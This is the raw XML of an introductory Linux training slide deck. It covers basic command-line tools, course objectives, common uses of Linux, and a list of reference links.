              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ftp: Basic file transfer program</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>grep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Print </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>lines that match </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>patterns</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>jobs: Lists the active jobs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>kill: Terminate a process</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>less: Program to filter through text one screen at a time</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>locate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Finding </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>the location of a specific file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ls: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>List </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>directory contents </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Useful CLI Syntax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32147905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ps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: Snapshot of current processes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>m</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: Remove a file or a directory and its contents</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>cp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: Copy files or directories to remote host</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>stat: Display file or file system status</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>udo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: Access root from regular user account</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ar: Archiving and compressing files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ouch: Create a file or modify timestamps</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>which: Command to search for executable files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>who: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Show </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>who is logged on</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Useful CLI Syntax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7006282" y="2632388"/>
            <a:ext cx="5313405" cy="1815882"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Most important command </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>to explain other commands</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>m</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>an: Formats and displays the online manual pages</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29468531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4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Summary</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="565666" y="1595441"/>
            <a:ext cx="11176000" cy="4795837"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Intro to Linux</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Linux Operating System</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Key Linux components</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>User space and Kernel space</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Linux files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Linux permissions </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Linux logging</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Linux application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Useful command line interface syntax</a:t>
            </a:r>
          </a:p>
          <a:p>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Web servers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cloud storage</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Drop Box</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Google Drive</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Microsoft Azure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Mobile technology</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Android</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Appliances</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Apache</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Review: Common Linux Uses</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="15" name="Group 14"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5024575" y="1343025"/>
            <a:ext cx="6446989" cy="4628284"/>
            <a:chOff x="5024575" y="1343025"/>
            <a:chExt cx="6156044" cy="4958527"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:graphicFrame>
          <p:nvGraphicFramePr>
            <p:cNvPr id="4" name="Diagram 3"/>
            <p:cNvGraphicFramePr/>
            <p:nvPr>
              <p:extLst>
                <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                  <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="927016545"/>
                </p:ext>
              </p:extLst>
            </p:nvPr>
          </p:nvGraphicFramePr>
          <p:xfrm>
            <a:off x="5024575" y="1343025"/>
            <a:ext cx="6156044" cy="49585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5126182" y="1595442"/>
              <a:ext cx="609600" cy="830997"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="4800" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2"/>
                  </a:solidFill>
                  <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                </a:rPr>
                <a:t></a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="4800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="TextBox 8"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5583382" y="2486025"/>
              <a:ext cx="609600" cy="830997"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="4800" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2"/>
                  </a:solidFill>
                  <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                </a:rPr>
                <a:t></a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="4800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="TextBox 9"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5735782" y="3445530"/>
              <a:ext cx="609600" cy="830997"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="4800" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2"/>
                  </a:solidFill>
                  <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                </a:rPr>
                <a:t></a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="4800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="TextBox 10"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5583382" y="4352727"/>
              <a:ext cx="609600" cy="830997"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="4800" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2"/>
                  </a:solidFill>
                  <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                </a:rPr>
                <a:t></a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="4800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="TextBox 11"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5126182" y="5336124"/>
              <a:ext cx="609600" cy="830997"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="4800" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2"/>
                  </a:solidFill>
                  <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                </a:rPr>
                <a:t></a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="4800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Rounded Rectangle 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="5883976"/>
            <a:ext cx="12192000" cy="692727"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:no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i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Linux is used throughout Air Force mission systems and networks</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="2400" b="1" i="1" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23457102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0" name="Rectangle 12"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Objectives</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="565666" y="1595441"/>
            <a:ext cx="11176000" cy="4795837"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Describe the major Linux file system directories</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Describe the Linux Kernel</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Describe shared libraries for Linux</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Describe Pluggable Authentication Modules</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Describe Linux Daemons</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>List four common shell types for Linux</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Describe the difference between user space and Kernel space</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Describe the three special permissions in Linux</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2220470674"/>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effectLst/>
              </a:rPr>
              <a:t>https://community.broadcom.com/symantecenterprise/ communities/community-home/librarydocuments/viewdocument? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>DocumentKey</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>=96f09996-0dca-467d-a50c-e9f2fe18681e&amp;Community </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Key=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&amp;tab=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>librarydocuments</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>community.turgensec.com/ssh-hacking-guide</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>https://cybersecurity.att.com/blogs/labs-research/hunting-for-linux-library-injection-with-osquery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>docs.Microsoft.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>https://hostingtribunal.com/blog/linux-statistics/#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>gref</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>pen-testing.sans.org/resources/papers/gcih/attack-defend-linux-privilege-escalation-techniques-2016-152744</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>pentesterlab.com/exercises/linux_host_review/course</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>smallbusiness.chron.com/differences-between-linux-security-windows-security-79959.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>web.mit.edu/rhel-doc/5/RHEL-5-manual/Deployment_Guide-en-US/ch-selinux.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>https://x-c3ll.github.io/posts/PAM-backdoor-DNS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>www.linfo.org/var.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>www.ntu.edu.sg</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>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13628692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effectLst/>
              </a:rPr>
              <a:t>https</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>://www.tecmint.com/linux-directory-structure-and-important-files-paths-explained</a:t>
            </a:r>
